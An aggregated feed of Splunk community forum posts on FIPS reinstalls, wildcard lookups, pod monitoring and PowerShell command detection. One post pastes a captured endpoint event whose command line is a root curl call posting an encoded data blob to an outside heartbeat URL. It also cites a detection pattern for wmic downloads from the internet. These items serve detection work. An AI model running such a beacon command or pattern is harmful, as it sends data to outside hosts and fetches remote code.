All Posts

@YJ , In Splunk UBA version 5.3.0, all Log4j-related jars in the OS packages have either been removed or replaced by Reload4j, except for the following: https://docs.splunk.com/Documentation/UBA/5.3.0/ReleaseNotes/RemoveLog4j If you are below version 5.3.0, I would update.
Red Hat 8.10 and 9.2 are not yet supported; however, you can try an install based on the older kernel version "4.18.0-477.27.1.el8_8.x86_64", which is supported. I have had some luck before using the older kernel with an updated system, but know that it's not supported. **There may be some untested bugs when doing this, but it will allow you to install.
Here is the event: {"ChangeTime":"159019401599.660","CapPrm":"274877906943","ParentProcessId":"41312874540918","SourceProcessId":"41312874540918","aip":"167.8.84.8","SessionProcessId":"41312874540918","SHA1HashData":"0000000000000000000000000000000000000000","event_platform":"Lin","ProcessEndTime":"1715545935.034","SVUID":"0","EventOrigin":"1","id":"92d99f91-6970-4f66-a38a-762e6b2af7b9","EffectiveTransmissionClass":"2","Tags":"12094627905582, 12094627906234","timestamp":"1715545919041","ProcessGroupId":"32517225337224","event_simpleName":"ProcessRollup2","RawProcessId":"17459","RootPath":"/","GID":"0","SVGID":"0","MD5HashData":"b194675c8ea858f2ed21214e9bbfc16b","SHA256HashData":"14ac73386c9ca706968f2ad2bd2a861f37659d669756e730fe2747d3b726f1da","UID":"0","CommandLine":"curl -g -k -H user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;) --connect-timeout 5 -d status=IYtBsvtfYai1wFsAeUU1ad8hCB8fX2hRrPvM%2bfwQVOb30LoDJluceAyV5jg75J8bHbinyYONJqjAbsrxiZwsLcFKHE59NwzNLLBkZ88ZBNu%2bc%2bGO2WxnITbXkXZyQJkMbdXlnnAwJ602gWkuOhmsiw3Ft5c%2b4Tduq615Hllj4u5whtm9TQxay%2bOQy4mVeJ7tfurRODGqsHw6mlsjXSpmgNUA5cSDVkiuc1pCzMugiOur5Dh2XoG7ABj%2bfEjEBe33hjD6431XFaKA8YkUoLJ424pYBhiFc%2bSK7Xd1csiCYwK4jwO98E4%2f8vLn37nFw8a2Uwiy8lOeP1e1skwDMccJR7jhAndmIQtSL1GruLm9lUpGwt%2b%2bmm%2bwawKl6NEca%2bNLJeWq7EcnfpPsZzPkV9kpyPu8Pz2mrZy%2fkKoXUEoeP0IOg6sRDrYu4%2bDNhcLT3znS8OqBxi%2bZypOcnABSwamvRXP048qJHQx7pm7yPkMaG20VjGtP48RUNGM2jloRNtbgHfJW2D3BmRp2De8rNRp5fdnzKB0i%2fUfYQ%2fWbLxYoZ4LQv3YEvT6XssTi1yScdJj3miAD%2b9Q5y4R1%2fLKUO9BUIeKvf0Zm23k7BSiqznd2skvuqUo4gb6JPwPW4zpctCiAKwZlKDY4AbZe1gBkJJWrrv%2bJ8VJTP37W5fTFtsqqTEc8ziL40%2bvqes1NLAiSEN31ABppkOmgZtkPXrC42utxYLjeMC06Raic6iLmymZo%2f5UrD31SshEm5k6KvVdZ2Bf%2fsPPjsf8uXfzhTxDmvWgYcVAkbvsukaVBQcrvqxXd1zSKbgTWEO41uXWdPSNqZtHj2TubS%2flCikiJPYX1zMhjsFFvkGlPIyTz%2bgCvm3JzLlcVT%2fLWJ216l4ozrD0%2b2Gq4wHuUlE8zcHZo00Vo9ysmAqEQ8HoWVzr1ZRRY7Lfn%2bhS0V7Uvlt65JDEm%2bA3aRcwNDBiNjkYNrU3LfTnBdCKgE1b8qpzcwoJMuPNadSZLPa3gKP%2fLXWNN266rW%2f1bqg5exR%2bk8D
2ipueAUYYuJlCvsyvvU%2bh%2fF6zyJzqKN8zpy1tWtpGPBzFEbxixjBozX3LfficGlz1hDuLEclKKpH8rpOHSwsXrHGX%2fEiN5NRx4tPyR%2bGWmPMXm94ZazpH153EW0ixtQNaJJBBkR1Jmave6xacXustk9Tz67EcB0cPY2cEL%2bKzTVm%2fv7mEJRO2ohkzGmfBYsncbzBB3CssQp%2fSNcOoX%2fFl%2bBKiA3YSGiOuLv4nPG84PkfOKwTd7irZF3evTl4GEg8Ajkm54fMf5kFY1v3fH3b9NfPwZDMlDKOCNMYJuhXmglCdI1FQsJiIlyPZVrY21YcmQgGfJT7Bau64wq%2bHfP2p9P1oyU4%2f3mkH3tkWb%2bL754Ss%2fIRl%2fFFY9rOHOt7kBphaFgB9JEaoxFTtIYy%2fT66BXmr957lKlBiJg08FYBYE1PR6%2bPwMiCftCu2tdU3HulvTGR1Exc4shovJAVgq6iwWYHmpZo%2bqRuM8cz1itutz%2b%2bm7ZQDlbaiU1%2bSvDGOgBU%2f423vojnbrHKb6hYQIS%2bGrSBUuJBeZHLiKOfkPfsFvNYZIcmD%2bRkNCgwf4nTooOIY5GffKGH0LOPeT8RZzOcytEBjyu9%2fMQVIonZMc73lavnz7uPCRtGiezB%2fjkFj5UkSplosXjlN%2fyQbfoR5RQhUcgVKQpoSGrSUeT%2bSRyrV5QBtDwHTykUIzAUu%2bUvC3Vfwe0Oz24TCTfRFm%2bKhHGEt7v9PB8NZ0oCzkMwR6VerNptlspoWGjr91j0OXB6hlxjDxOD%2bIrZMNKpfunrfOgXZEIywAf18sgF0O6Xgo%3d --retry 0 -L http://wvcfg.wetmet.net/api/serverservice/heartbeat.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhWQoixYAF0bj0%3d&version=Y9Ml9TL3Ayxy77SNYVWxkLuS7eHa4%2bBQxFHVCdAP%2f%2fw%3d","TargetProcessId":"43142923935709","ImageFileName":"/usr/bin/curl","RGID":"0","SourceThreadId":"0","RUID":"0","ProcessStartTime":"1715545934.678","aid":"42ab2efd409d492ba5f376f467370a44","cid":"09919f785a7e46ef8c53da25fbd9d186"} It should match with this lookup entry: wmic*get*http Using wmic to get and run files from internet   It does matches but I am just not able to display command and description in my final result.   Thank you
FIPS has to be turned on before starting Splunk.  If you've already started Splunk then you'll have to remove it and re-install it.  See https://docs.splunk.com/Documentation/Splunk/9.2.1/Security/SecuringSplunkEnterprisewithFIPS
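As a sketch of what that pre-start configuration can look like (the path assumes a default $SPLUNK_HOME; verify against the docs linked above), FIPS mode is enabled in splunk-launch.conf before Splunk is started for the first time:

```
# $SPLUNK_HOME/etc/splunk-launch.conf
# This must be present before the very first start of splunkd;
# toggling it on an already-initialized install is not supported.
SPLUNK_FIPS=1
```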
If you include the wildcards in your lookup matching field and define the lookup to use WILDCARD matching, you may be able to lookup a field in the lookup when there is a wildcard match. Please share some anonymised events and contents of your lookup so we can see the sorts of things you are trying to match.
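To illustrate the idea (the lookup name command_lookup and its fields pattern and description are hypothetical; the lookup definition would need its match type set to WILDCARD(pattern)), a wildcard lookup is typically applied like this:

```
index=my_index
| lookup command_lookup pattern AS CommandLine OUTPUT description
| where isnotnull(description)
| table _time CommandLine description
```

Events whose CommandLine matches any wildcard pattern in the lookup get the corresponding description; the rest are filtered out by the isnotnull test.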
Some context: I have a scripted input that sends the output of kubectl get po -A --show-labels into the abc index and kubectl sourcetype. Each pod has the importance label with a value of either critical or non-critical. Some pods haven't had that label applied yet, which is why I had the fillnull importance lines in my original query. Agreed that they can be ignored for this task. An event in the index would look something like this: _time namespace pod_name importance etc. The other fields are irrelevant to this search. This data gets ingested into Splunk every minute.

Each pod's name is unique (one container per pod), so I believe the lookup table's wildcard pod groups will map to the individual pods. For example, there would only be one apache pod, not apache-2 and apache-12. I don't believe there are any concerns with the grouping.

When I say that I know the data is missing, I mean that there is a pod (kafka) that hasn't been deployed for over a week. It is not being reported by the scripted input I mentioned earlier. That pod is listed in the pod lookup as kafka-*. Unfortunately I am unable to provide screenshots.

The trouble I am having with the query you generously shared is that when it runs and is visualized as a line chart with the 24h time range picked, the kafka pod shows a count of 1 (missing) 24 hours ago, then drops to 0 for the rest of the time up until the current hour, where it returns to 1. Nothing changed during that time with the actual deployment status of that pod.
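A sketch of one way to make the chart behave, assuming a lookup named pod_lookup with a wildcard-matched column pod_pattern (names are assumptions based on the description above): timechart emits a contiguous hourly axis, so once fillnull turns absent buckets into explicit zeros, those zeros can be flipped into a missing flag.

```
index=abc sourcetype=kubectl earliest=-24h@h latest=@h
| lookup pod_lookup pod_pattern AS pod_name OUTPUT pod_pattern AS pod_group
| timechart span=1h count by pod_group
| fillnull value=0
| untable _time pod_group count
| eval missing = if(count = 0, 1, 0)
| xyseries _time pod_group missing
```

One caveat: a pod that never appears anywhere in the window (like kafka-*) produces no column at all, so truly absent pods would still need to be appended from an inputlookup of the expected list.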
You don't need a dashboard to create a search - just use the search and reporting interface to find the events you are interested in. Do you know what these events are?
Do you have a report that identifies the employees that were added in the previous month?
No, I don't have a customized dashboard. Can you please share some reference query?
Please share the event which was supposed to have matched, and the entry in the lookup that it should have matched to.
Hey guys, I am working on a report that needs to show any new employees who joined the company in the last 30 days. Right now I have a report constructed that pulls data over the last 30 days on all employees in the company. How can I filter this report to show only the employees who were added to the company within those 30 days? I will schedule this report to run weekly.
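A sketch, with placeholder names (the index hr_data and field employee_id are assumptions): compute each employee's first appearance over a longer window, then keep only those first seen within the last 30 days.

```
index=hr_data earliest=-90d@d
| stats earliest(_time) AS first_seen by employee_id
| where first_seen >= relative_time(now(), "-30d@d")
| convert ctime(first_seen)
```

Searching back further than 30 days matters here; if the search window itself were only 30 days, every employee would trivially "first appear" inside it.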
I installed Splunk Enterprise 9.2.0.1 without FIPS mode on, and now I've found out I need to have it on. Luckily, I haven't done too much work, just one server and a few Universal Forwarders. I believe I have to scrap the current installation of the SH/Indexer and all the UFs, correct? There is no way to enable it in the current install, as far as I can tell. Also, are there any files I could save, so I can reuse them?
I tried with the lookup definition "WILDCARD(commands)", but that didn't work!
Hello Community! I am trying to set up a search to monitor PowerShell commands from Windows hosts. Specifically, I am starting from: an index with the full messages related to PS commands, contained in a field named "Message" (related, for example, to event codes 4101, 800, etc.), and a .csv file with the list of commands I would like to monitor, contained in a column named "PS_command".

From these premises, I have already constructed a search that leverages inputlookup to search for the strings from the PS-monitored.csv file in the index field Message, outputting the result in a table as follows (also adding details from the index: _time, host and EventCode).

index="wineventlog"
| search ( [| inputlookup PS-monitored.csv | eval Message= "*" + PS_command + "*" | fields Message] )
| table _time host EventCode Message

This, despite not being the most elegant solution (with the addition of wildcard characters *), is currently working; however, I would also like to include the original search field (the PS_command column from PS-monitored.csv) in the final table. I tried to experiment a bit with the lookup command and with join options, without success; does anyone have some suggestions? Finally, I would like to avoid using heavy commands, such as join, if at all possible. Thanks in advance!
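A sketch of how the lookup command could return PS_command directly, assuming you add a pre-wildcarded column to the CSV (say Message_pattern, holding "*" + PS_command + "*") and create a lookup definition named PS-monitored with match type WILDCARD(Message_pattern); the definition name and column are assumptions:

```
index="wineventlog"
| lookup PS-monitored Message_pattern AS Message OUTPUT PS_command
| where isnotnull(PS_command)
| table _time host EventCode Message PS_command
```

This keeps only events whose Message matches one of the patterns, and carries the matching PS_command into the final table without join.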
To use wildcards in lookups they have to be defined as match type WILDCARD https://docs.splunk.com/Documentation/Splunk/9.2.1/Knowledge/Usefieldlookupstoaddinformationtoyourevents#Create_a_CSV_lookup_definition  
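As an illustrative transforms.conf fragment (the stanza name and column are placeholders for whatever the lookup definition is called):

```
[ps_monitored_lookup]
filename = PS-monitored.csv
match_type = WILDCARD(PS_command)
max_matches = 1
```

The same match type can also be set in the UI under Settings > Lookups > Lookup definitions > Advanced options.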
Start with a search that returns the data you are interested in visualising. Do you have this already?
What do you get when you try this?

index=application_na sourcetype=my_logs:hec source=my_Logger_PROD retrievePayments* returncode=Error
| rex field=message "Message=.* \((?<apiName>\w+?) -"
| chart count over client by apiName
Hello Shubham, In addition to Ryan's suggestion, I'm posting more useful links for your reference, in case they may help. Please note that AppDynamics moved extensions to an open-source model, to enable customers to directly evolve them to suit their needs and build new use cases; you can find more information at https://docs.appdynamics.com/display/PAA/Support+Advisory%3A+Changes+to+Extensions+Support+Model We have also documented answers to the most common extension queries, along with troubleshooting tips and tricks, in the following links: Extensions troubleshooting Advanced Extensions Troubleshooting Best Regards, Rajesh Ganapavarapu
Need a report based on the previous day. I have source IP segment xx.xx.xx.xx/28 and destination IP segment xx.xx.xx/24. The outcome of the query should provide the below: date and start + end time of the connection, USERNAME, APPLICATION:PORT & PROTOCOL, APPLICATION SEGMENTS, ACCESS POLICY NAME, ACTION. How can I create a customized dashboard? Please suggest.
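A starting-point sketch, with the index and field names as placeholders to adapt (the xx segments are kept from the post above, not filled in):

```
index=my_network_index earliest=-1d@d latest=@d
| where cidrmatch("xx.xx.xx.xx/28", src_ip) AND cidrmatch("xx.xx.xx/24", dest_ip)
| stats earliest(_time) AS start_time latest(_time) AS end_time
        values(app) AS application values(dest_port) AS port values(protocol) AS protocol
        values(policy_name) AS access_policy values(action) AS action
    by user
| eval date = strftime(start_time, "%Y-%m-%d")
| eval start_time = strftime(start_time, "%H:%M:%S"), end_time = strftime(end_time, "%H:%M:%S")
| table date start_time end_time user application port protocol access_policy action
```

Once a search like this returns what you want, you can save it to a dashboard via Save As > Dashboard panel.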
It would help if you could share some anonymised raw events in a code block to prevent formatting corruption; that way we can see what you are working with and be better able to guide you.